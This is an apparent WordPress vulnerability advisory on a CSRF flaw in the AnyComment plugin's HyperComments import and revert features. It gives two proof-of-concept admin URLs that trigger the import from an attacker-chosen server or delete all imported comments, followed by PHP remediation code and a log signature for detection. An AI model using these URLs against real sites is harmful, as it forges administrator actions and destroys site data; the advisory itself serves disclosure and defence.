wpexploit | Brandon Roldan | WPEX-ID: FA09EA9B-D5A0-4773-A692-9FF0200BCD85
Jan 19, 2022 - 12:00 a.m.

AnyComment < 0.2.18 - Arbitrary HyperComments Import/Revert via CSRF


EPSS: 0.001 (Low), percentile 43.6%

The plugin does not perform CSRF checks (no nonce verification) in its Import and Revert HyperComments features, allowing attackers to make a logged-in admin perform these actions via a CSRF attack.

Go to https://example.com/wordpress/wp-admin/admin.php?r=import%2Fhypercomments&url=http://<your_server>, and you will see a GET request in your server logs indicating that the import request was performed.

To revert the imports (i.e. delete all imported comments): https://example.com/wp-admin/admin.php?r=import%2Fhypercomments&revert=1
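The root cause above is a state-changing admin action reachable by a plain GET with no request token. As an added example, not the AnyComment plugin's own code, this is how such an import/revert handler is gated in WordPress: the link is minted with `wp_nonce_url()`, and the handler calls `check_admin_referer()` (nonce check) and `current_user_can()` (capability check) before touching anything. All `example_*` function names, the `_example_hc_import` comment meta key and the assumed JSON shape of the remote export are hypothetical; `wp_nonce_url`, `check_admin_referer`, `current_user_can`, `wp_safe_remote_get`, `get_comments`, `wp_insert_comment` and `wp_delete_comment` are real WordPress core functions.

```php
<?php
// Added example (not the plugin's code). Shows the missing CSRF/authorisation
// gate for an admin "import" and "revert" action. Names prefixed example_ are
// hypothetical.

// 1. Wherever the admin UI renders the import/revert link, bind a nonce to it.
//    wp_nonce_url() appends _wpnonce=<token> tied to the action name and the
//    current user's session, which a third-party page cannot obtain.
function example_hypercomments_action_url( $source_url, $revert = false ) {
    $args = array( 'r' => 'import/hypercomments' );
    if ( $revert ) {
        $args['revert'] = '1';
    } else {
        $args['url'] = $source_url;
    }
    $url = add_query_arg( $args, admin_url( 'admin.php' ) );
    return wp_nonce_url( $url, 'example_hypercomments_import' );
}

// 2. The handler refuses to act unless the nonce AND the capability check pass.
function example_handle_hypercomments_action() {
    if ( ! isset( $_GET['r'] ) || 'import/hypercomments' !== $_GET['r'] ) {
        return;
    }
    // CSRF gate: dies with a 403 page if _wpnonce is missing or invalid.
    // This single call is what the vulnerable versions lack.
    check_admin_referer( 'example_hypercomments_import' );

    // Authorisation gate: a nonce proves intent, not privilege.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Not allowed.' ), '', array( 'response' => 403 ) );
    }

    if ( ! empty( $_GET['revert'] ) ) {
        example_revert_imported_comments();
        return;
    }

    $source = isset( $_GET['url'] ) ? esc_url_raw( wp_unslash( $_GET['url'] ) ) : '';
    if ( '' === $source ) {
        wp_die( esc_html__( 'Missing import URL.' ), '', array( 'response' => 400 ) );
    }
    example_import_from_hypercomments( $source );
}
add_action( 'admin_init', 'example_handle_hypercomments_action' );

// Fetches the remote export and inserts its comments, tagging each one so the
// revert path can find exactly what was imported. The JSON shape
// [{"post_id":1,"author":"..","content":".."}, ...] is an assumption for this
// example. wp_safe_remote_get() (rather than wp_remote_get()) refuses URLs that
// point at internal/loopback hosts, so the admin-supplied URL cannot be turned
// into a server-side request to the local network.
function example_import_from_hypercomments( $source ) {
    $response = wp_safe_remote_get( $source, array( 'timeout' => 15 ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        return 0;
    }
    $entries = json_decode( wp_remote_retrieve_body( $response ), true );
    if ( ! is_array( $entries ) ) {
        return 0;
    }
    $count = 0;
    foreach ( $entries as $entry ) {
        $comment_id = wp_insert_comment( array(
            'comment_post_ID'  => (int) ( $entry['post_id'] ?? 0 ),
            'comment_author'   => sanitize_text_field( $entry['author'] ?? '' ),
            'comment_content'  => wp_kses_post( $entry['content'] ?? '' ),
            'comment_approved' => 0, // hold imported comments for moderation
        ) );
        if ( $comment_id ) {
            add_comment_meta( $comment_id, '_example_hc_import', '1', true );
            $count++;
        }
    }
    return $count;
}

// Deletes only comments carrying the import marker, never the whole table.
function example_revert_imported_comments() {
    $ids = get_comments( array(
        'meta_key'   => '_example_hc_import',
        'meta_value' => '1',
        'fields'     => 'ids',
        'number'     => 0, // no limit
    ) );
    foreach ( $ids as $id ) {
        wp_delete_comment( (int) $id, true );
    }
    return count( $ids );
}
```

With this in place, the proof-of-concept URLs above fail with a 403 because they carry no valid `_wpnonce`, and an admin who is merely logged in but lacks `manage_options` is also refused. For detection in the meantime, admin-side requests to `admin.php?r=import/hypercomments` (encoded as `r=import%2Fhypercomments`) that arrive with an off-site `Referer` or no `_wpnonce` parameter are the signature to watch for in web server logs.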

https://www.youtube.com/watch?v=75BH2m8cmPo

